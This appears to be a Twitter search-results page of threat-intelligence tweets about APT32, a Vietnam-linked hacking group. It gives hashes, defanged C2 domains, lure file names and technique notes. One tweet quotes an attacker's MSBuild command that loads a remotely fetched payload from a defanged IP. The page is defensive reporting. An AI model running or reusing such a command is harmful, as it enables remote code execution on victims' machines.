Rezultati pretraživanja
  1. 30. sij
    Odgovor korisnicima

    🇻🇳 has to brief metrics like any other government program. Using sales tracking software, their numbers can show what % breached each target is. NOTE: APT32 uses trial accounts for several sales trackers that also allow for legit cloud hosting of their payloads! 📈 ☁️ 💣

  2. 28. sij

    Moral of the story is - opening an email in certain mail clients can leak information about your system b/c your mail client autoloads a tracking pixel. And although it might be a company hosting a hot party - it could also be someone less "friendly"

    Prikaži ovu nit
  3. 28. sij

    Let's talk about email tracking pixels for a minute and how sales/marketing (as well as real threat actor's) can use them to evaluate the success of an email marketing (or phishing) campaign...or for information gathering before sending a follow-up payload.

    Prikaži ovu nit
  4. 9. sij
    Odgovor korisniku/ci

    Further reading on Vietnamese threat actor 🇻🇳 leveraging EPO's software deployment pulls to ship Cobalt Strike enterprise-wide: 🏚️🚪▶️🖥️📀⏩🏘️⏭️🌆😵 I still think asset management abuse needs a fun name. How about "living off the landlord?"

  5. 9. sij

    Interesting tidbit from report. “The attacker utilized the anti-virus management console service account to distribute the malware across the network.” Sounds similar to deploying Cobalt Strike via McAfee EPO server & I discussed recently on

  6. 20. pro 2019.

    () campaign spreading via FB. Post or DM contains link to a malicious archive hosted on Dropbox. First stage is executed upon opening the decoy “document” seemingly related to Vietnam. Beacons to opengroup.homeunix[.]org via HTTPS.

  7. For the U.S. crowd, just waking up: BMW was hacked by . The carmaker decided to monitor the intruders for months to better understand their goals. No sensitive data is said to be stolen. Also, Hyundai was targeted in the same campaign. (in german)

  8. Exklusiv: Eine Hackergruppe, die mutmaßlich im Auftrag des Staates Vietnam agiert, hat deutsche Automobilkonzerne im Visier. Ihnen ist es gelungen, in die Netzwerke von BMW einzudringen. BMW hat die Hacker über Monate beobachtet.

    Prikaži ovu nit
  9. 27. lis 2019.

    Stopped using PowerShell for attacks? Seems to be working just fine for 🇻🇳 lang.ps1 uploaded yesterday (3/56): I appreciate their signature obfuscation style (pictured) The underlying backdoor here is very creative... [1/2]

    Prikaži ovu nit
  10. 23. lis 2019.

    DLL side-loading seems utilized by the group to deliver malware generated by Strike URL:hxxps://cdn.redirectme.net/JbJf File name:Noi dung chi tiet thu moi tham du hoi nghi va lich trinh dien ra hoi nghi tai thu do Paris Phap

  11. 21. lis 2019.

    New test sample seems crafted by the APT group. Malicious payload is dropped to the startup folder through exploit (-2018-20250), meanwhile a resume gets displayed to confuse the victim.

  12. 28. kol 2019.

    targets on Vietnamese human right organization SHA1: c159e6489ca0b516017b7468013084a8fc422870 File name: "Danh sach cac ca nhan to chuc tai Hai ngoai va quoc noi ung ho cac tu nhan luong tam bi buc hai.exe"

    Prikaži ovu nit
  13. 15. kol 2019.

    Decoy document containing the map of Spratly Islands seems used by the APT group. Similar DLL Side-Loading approach is utilized to carry out related attacks.

  14. 8. kol 2019.

    may be cluster ref. repo of 25/07 md5:05b5707d79ca0aee269eb1b02db75b19

  15. 2. kol 2019.

    The SFX archive drop and execute a lure (docx file) for decoy the victim and the dll file (pkg file) for loader the Quasar RAT with the bin file. Its have for the role to reorganize the final PE.

    Prikaži ovu nit
  16. 29. srp 2019.

    c7eead9b2a622dd7f14f2ddb9bcd4ea3c4cf3a7dddc30283a057482c4ed6a93e WN: ប្រកាសតែងតាំងមុខតំណែង_docx.exe C2: get[.]freelicenses[.]net

  17. 21. svi 2019.

    phishing - now with more Windows.csproj & .mp4 downloaded with certutil MSBuild.exe %TEMP%\Windows.csproj /p:AssemblyName=%TEMP%\Windows.mp4 /p:ScriptFile=hxxp://139.59.30[.]109:8090/abcv /p:Key="WindowsService" Payload loaded in memory then deleted from disk

    Prikaži ovu nit
  18. 16. svi 2019.

    d53779393984053ec239ec16adc272d7 Embedding Base64 string in Content

  19. 10. svi 2019.
  20. 20. stu 2018.

    / is back with a new watering hole campaign. Many compromised websites including 2 Cambodian ministries (Ministry of Foreign Affairs and Ministry of Defence). Blog: event:

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.